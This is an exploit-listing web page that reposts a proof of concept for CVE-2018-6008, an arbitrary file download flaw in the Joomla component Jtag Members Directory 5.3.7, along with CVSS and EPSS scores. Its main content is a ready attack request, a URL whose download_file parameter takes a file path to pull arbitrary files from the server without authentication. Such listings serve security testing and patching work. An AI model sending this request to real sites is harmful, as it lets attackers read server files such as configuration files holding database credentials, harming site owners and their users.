Advertisement






Joomla! Jtag Members Directory 5.3.7 Arbitrary File Download

CVE Category Price Severity
CVE-2018-6008 CWE-Other N/A High
Author Risk Exploitation Type Date
Unknown High Remote 2018-01-29
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010320

Below is a copy:

Joomla! Jtag Members Directory 5.3.7 Arbitrary File Download
# # # # #
# Exploit Title: Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download
# Dork: N/A
# Date: 27.01.2018
# Vendor Homepage: https://joomlatag.com/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/members-lists/jtag-members-directory/
# Version: 5.3.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6008
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker download arbitrary file....
# 
# Proof of Concept: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=[FILE]
# 
# # # # #

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum